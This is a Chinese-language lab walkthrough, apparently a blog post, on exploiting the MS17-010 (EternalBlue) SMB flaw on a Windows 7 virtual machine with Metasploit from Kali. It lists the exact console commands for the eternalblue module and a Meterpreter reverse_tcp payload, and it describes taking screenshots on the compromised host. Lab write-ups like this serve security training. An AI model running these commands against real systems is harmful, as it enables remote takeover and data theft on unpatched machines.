利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)

利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)

1.实验环境

  虚拟机里面配置 kali 和 win7 在同一网段下,这里我设置的10.10.10.0/24:
  Kali linux  2019(10.10.10.131)
  Windows 7 X64 (10.10.10.130)
       环境链接:[密码 :b79j](https://pan.baidu.com/s/1JcYgJ8SgiwUXoIZhgakSnw)

2.漏洞介绍

  Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

3.攻击过程

1.ping 命令连通性测试
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第1张图片
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第2张图片
可以ping通,如果ping 130 不通,看下win7 是不是开了防火墙

2. Kali 攻击步骤
1.攻击模块 msf : msfconsole
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第3张图片
2.利用模块查询 search ms17_010

利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第4张图片
利用针对 win 7 的模块: use exploit/windows/smb/ms17_010_eternalblue利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第5张图片
3.攻击参数配置
主要配置 :
攻击目标 :set rhosts 10.10.10.130
执行攻击:exploit

在这里插入图片描述
开始攻击得到shell !攻击成功

利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第6张图片
4.另一种方式:设置Meterpreter payload后在进行攻击

 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,此模块包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 

利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第7张图片
只需要比上一步多一条配置:set payload windows/x64/meterpreter/reverse_tcp

执行成功:
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第8张图片

阔以进行各种有意思的操作了:screenshot 屏幕截图等
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第9张图片
get 屏幕截图:
利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程(永恒之蓝)_第10张图片

5.Tips
如果执行不成功,可以尝试 修改下端口在尝试

set slport 22254[随便设置不常用的端口]

你可能感兴趣的:(安全)